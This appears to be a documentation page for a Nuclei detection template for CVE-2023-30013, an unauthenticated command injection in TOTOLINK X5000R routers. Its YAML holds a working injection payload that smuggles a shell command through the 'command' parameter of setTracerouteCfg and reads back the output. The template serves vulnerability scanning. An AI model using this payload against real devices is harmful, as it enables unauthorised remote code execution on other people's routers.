Skip to content
Nuclei Templates

TOTOLink - Unauthenticated Command Injection

ID: CVE-2023-30013

Severity: critical

Author: gy741

Tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive

Description

Section titled “Description”

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the “command” parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2023-30013


info:
  name: TOTOLink - Unauthenticated Command Injection
  author: gy741
  severity: critical
  description: |
    TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30013
    - https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2
    - http://packetstormsecurity.com/files/174799/TOTOLINK-Wireless-Routers-Remote-Command-Execution.html
    - https://github.com/h00die-gr3y/Metasploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-30013
    cwe-id: CWE-78
    epss-score: 0.96305
    epss-percentile: 0.99539
    cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: totolink
    product: x5000r_firmware
  tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive


http:
  - raw:
      - |
        POST /cgi-bin/cstecgi.cgi HTTP/1.1
        Host: {{Hostname}}


        {"command":"127.0.0.1; ls>../{{randstr}};#","num":"230","topicurl":"setTracerouteCfg"}
      - |
        GET /{{randstr}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "lan_ip"
          - "reserv"
        condition: and


      - type: word
        part: body_2
        words:
          - ".sh"
          - ".cgi"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a004630440220547e01061b32cff09b7eae9782f8fa39fd900090d4009a2d770f8fd00d17f9b702201bc32db80a0c1138bad6f24e52140c807b349e3c601f22dc6ec5c5e6e5f67aa5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30013.yaml"

View on Github